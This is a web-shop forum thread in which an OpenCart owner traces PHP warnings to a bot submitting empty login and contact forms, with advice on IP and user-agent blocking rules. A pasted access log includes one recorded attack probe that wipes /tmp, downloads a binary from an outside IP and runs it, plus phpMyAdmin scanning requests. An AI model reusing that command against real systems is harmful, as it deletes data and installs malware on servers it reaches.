Post by SScott » Wed Aug 31, 2022 12:25 am

Hello and thank you in advance. Can someone please give me direction in what to look for on these errors? I get them daily and by the dozens.

2022-08-30 1:53:28 - PHP Warning: Undefined array key "password" in /home/****/public_html/catalog/controller/account/login.php on line 174
2022-08-30 1:53:28 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 177
2022-08-30 1:53:33 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 160
2022-08-30 1:53:33 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 167
2022-08-30 1:53:36 - PHP Warning: Undefined array key "name" in /home/****/public_html/catalog/controller/information/contact.php on line 145
2022-08-30 1:53:36 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/information/contact.php on line 149
2022-08-30 1:53:36 - PHP Warning: Undefined array key "enquiry" in /home/****/public_html/catalog/controller/information/contact.php on line 153
2022-08-30 13:20:23 - PHP Warning: file_get_contents(https://www.google.com/recaptcha/api/siteverify?secret=****&response=&remoteip=91.211.89.207): Failed to open stream: Connection timed out in /home/****/public_html/catalog/controller/extension/captcha/google.php on line 27
2022-08-30 13:20:23 - PHP Warning: Trying to access array offset on value of type null in /home/****/public_html/catalog/controller/extension/captcha/google.php on line 31

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by SScott » Wed Aug 31, 2022 12:45 am

1. Version 3.0.3.8
2. None - Template/Theme
3. Several - (Additional) Installed Extension(s)
4. None - (Additional) Installed Translation(s)

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by straightlight » Wed Aug 31, 2022 8:33 am

SScott wrote:
Wed Aug 31, 2022 12:45 am
1. Version 3.0.3.8
2. None - Template/Theme
3. Several - (Additional) Installed Extension(s)
4. None - (Additional) Installed Translation(s)

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester


Legendary Member

Posts

Joined
Mon Nov 14, 2011 11:38 pm
Location - Canada, ON

Post by paulfeakins » Wed Aug 31, 2022 6:22 pm

Probably various extensions.

One seems to be that your server might not be allowing you to make a request to Google's CAPTCHA.

For quick, professional OpenCart support please email info@antropy.co.uk


User avatar
Guru Member
Online

Posts

Joined
Mon Aug 22, 2011 11:01 pm
Location - Reigate, Surrey, United Kingdom

Post by ADD Creative » Wed Aug 31, 2022 6:38 pm

Could be a bot doing a POST to account/login without the email and password fields. Look in you web access logs for the same times.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by SScott » Thu Sep 01, 2022 10:22 pm

paulfeakins wrote:
Wed Aug 31, 2022 6:22 pm
Probably various extensions.

One seems to be that your server might not be allowing you to make a request to Google's CAPTCHA.
How would I narrow it down to an ext? It is a dedi server and allows re-captcha on html pages I have built. Thank you kindly.
ADD Creative wrote:
Wed Aug 31, 2022 6:38 pm
Could be a bot doing a POST to account/login without the email and password fields. Look in you web access logs for the same times.
I suspected this as well. I will see if I can find matching times. Thanks!

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by SScott » Wed Sep 21, 2022 11:28 pm

ADD Creative wrote:
Wed Aug 31, 2022 6:38 pm
Could be a bot doing a POST to account/login without the email and password fields. Look in you web access logs for the same times.
Here is activity at the time of some of them. Any of this seem like the culprit?

104.248.8.32 - - [21/Sep/2022:09:33:08 -0500] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
40.94.29.194 - - [21/Sep/2022:09:34:25 -0500] "GET / HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
59.55.189.71 - - [21/Sep/2022:09:44:12 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 301 310 "-" "Hello, world"
136.243.220.210 - - [21/Sep/2022:09:46:03 -0500] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
103.147.64.43 - - [21/Sep/2022:09:48:47 -0500] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
80.94.92.239 - - [21/Sep/2022:09:51:29 -0500] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.131.66.209 - - [21/Sep/2022:09:54:22 -0500] "GET / HTTP/1.1" 301 231 "-" "curl/7.64.1"
107.173.40.211 - - [21/Sep/2022:09:54:25 -0500] "GET / HTTP/1.1" 301 239 "-" "python-requests/2.24.0"
182.254.225.35 - - [21/Sep/2022:09:56:57 -0500] "GET http://*.*.*.*:80/pma/scripts/setup.php HTTP/1.0" 301 256 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:57 -0500] "GET http://*.*.*.*:80/mysql/scripts/setup.php HTTP/1.0" 301 258 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:58 -0500] "GET http://*.*.*.*:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 301 263 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:58 -0500] "GET http://*.*.*.*:80/db/scripts/setup.php HTTP/1.0" 301 255 "-" "-"
107.167.35.138 - - [21/Sep/2022:09:57:46 -0500] "GET / HTTP/1.1" 301 239 "-" "-"

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by ADD Creative » Thu Sep 22, 2022 12:21 am

You would need to look for "POST /index.php?route=account/login" or "POST /index.php?route=information/contact" in you logs. That may be the wrong log file as all the responses are all 301 redirects, suggesting that is for http and not https.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by SScott » Thu Sep 22, 2022 2:53 am

ADD Creative wrote:
Thu Sep 22, 2022 12:21 am
You would need to look for "POST /index.php?route=account/login" or "POST /index.php?route=information/contact" in you logs. That may be the wrong log file as all the responses are all 301 redirects, suggesting that is for http and not https.
Thank you!

You were right. I grabbed the most recent ones from the https version.

Here is the error in opencart:
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 167
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:55 - PHP Warning: Undefined array key "password" in /home/*/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 177
2022-09-21 13:27:56 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:56 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 167
2022-09-21 13:27:58 - PHP Warning: Undefined array key "name" in /home/*/public_html/catalog/controller/information/contact.php on line 145
2022-09-21 13:27:58 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/information/contact.php on line 149
2022-09-21 13:27:58 - PHP Warning: Undefined array key "enquiry" in /home/*/public_html/catalog/controller/information/contact.php on line 153
Here are the logs for that time:
142.93.129.96 - - [21/Sep/2022:13:27:52 -0500] "GET / HTTP/1.1" 200 13568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:54 -0500] "GET /redacted HTTP/1.1" 200 13045 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9688 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/jquery/jquery-2.1.1.min.js HTTP/1.1" 200 29497 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 19882 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/stylesheet.css HTTP/1.1" 200 3507 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 7053 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/wide-grid.css HTTP/1.1" 200 347 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/so_megamenu.css HTTP/1.1" 200 6863 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/vendor/isenselabs/isearch/isearch.css HTTP/1.1" 200 418 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/supermenu.css?v=30 HTTP/1.1" 200 3815 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/msf/style.css?v HTTP/1.1" 200 551 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/msf/style-2.css?v HTTP/1.1" 200 - "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/so_megamenu.js HTTP/1.1" 200 1877 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 9745 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/vendor/isenselabs/isearch/isearch.js HTTP/1.1" 200 5339 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/supermenu-responsive.js?v=30 HTTP/1.1" 200 1356 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/jquery.hoverIntent.minified.js HTTP/1.1" 200 628 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/js_params.js?v HTTP/1.1" 200 208 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/bloodhound.min.js?v HTTP/1.1" 200 4476 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/typeahead.jquery.min.js?v HTTP/1.1" 200 8988 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/live_search.min.js?v HTTP/1.1" 200 1343 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/common.js HTTP/1.1" 200 3029 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/DFSLOGO.jpg HTTP/1.1" 200 26898 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /index.php?route=extension/module/supermenu/css HTTP/1.1" 200 99 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/LeftBanner.jpg HTTP/1.1" 200 47856 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted1050-228x228.png HTTP/1.1" 200 12505 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted1180-228x228.png HTTP/1.1" 200 7872 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted6470-228x228.png HTTP/1.1" 200 12716 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3410-228x228.png HTTP/1.1" 200 6535 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted345-228x228.png HTTP/1.1" 200 4200 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "redacted/catalog/view/javascript/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/UL366-228x228.png HTTP/1.1" 200 4676 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3100-228x228.png HTTP/1.1" 200 14316 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3110-228x228.png HTTP/1.1" 200 9147 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3340-228x228.png HTTP/1.1" 200 6880 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "GET /index.php?route=information/contact HTTP/1.1" 200 9793 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted5150-228x228.png HTTP/1.1" 200 11959 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/cart.png HTTP/1.1" 404 83180 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9615 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9701 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
Here is what I think is the offender?:
142.93.129.96 - - [21/Sep/2022:13:27:52 -0500] "GET / HTTP/1.1" 200 13568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9615 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9701 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by ADD Creative » Thu Sep 22, 2022 3:45 am

Does look like at bot. Repeated posts to the same URL and using an out of date user agent. I would start with banning that IP address. If you start seeing it from other IP addresses you can do things like blocking by user agent or empty post data. Other then that change the code in the controller to at least stop the error log filling up.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by SScott » Thu Sep 22, 2022 7:50 pm

ADD Creative wrote:
Thu Sep 22, 2022 3:45 am
Does look like at bot. Repeated posts to the same URL and using an out of date user agent. I would start with banning that IP address. If you start seeing it from other IP addresses you can do things like blocking by user agent or empty post data. Other then that change the code in the controller to at least stop the error log filling up.
I thought I had it nailed down but looked and have a whole new set of IP's doing it. I added the lines below after some googling but it did not help:

Code: Select all

#Redirect empty user agent

RewriteCond %{HTTP_USER_AGENT} ^$ 
RewriteRule .* http://%{REMOTE_ADDR}/ [R,L]
JNeuhoff wrote:
Thu Sep 22, 2022 4:52 pm
Our SpamBot Buster should be able to reject these posts.
Thank you sir. I will look into that right now.

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by SScott » Thu Sep 22, 2022 8:37 pm

JNeuhoff wrote:
Thu Sep 22, 2022 4:52 pm
Our SpamBot Buster should be able to reject these posts.
@JNeuhoff does this look right for settings?

Image

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

User avatar
Guru Member

Posts

Joined
Wed Dec 05, 2007 3:38 am


Post by ADD Creative » Thu Sep 22, 2022 11:23 pm

SScott wrote:
Thu Sep 22, 2022 7:50 pm
I thought I had it nailed down but looked and have a whole new set of IP's doing it. I added the lines below after some googling but it did not help:

Code: Select all

#Redirect empty user agent

RewriteCond %{HTTP_USER_AGENT} ^$ 
RewriteRule .* http://%{REMOTE_ADDR}/ [R,L]
That will not work as the bot does set a user agent. To block that version of Chrome.

Code: Select all

SetEnvIfNoCase User-Agent "^.*Chrome/85\.0\.4183\.121.*$" bad_bot
Deny from env=bad_bot
Or to block old versions of Chrome.

Code: Select all

SetEnvIfNoCase User-Agent "^.*Chrome/[1-8][0-9]\..*$" bad_bot
Deny from env=bad_bot
Of course the bot could change its user agent just like the IP address.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom
Who is online

Users browsing this forum: Bing [Bot] and 20 guests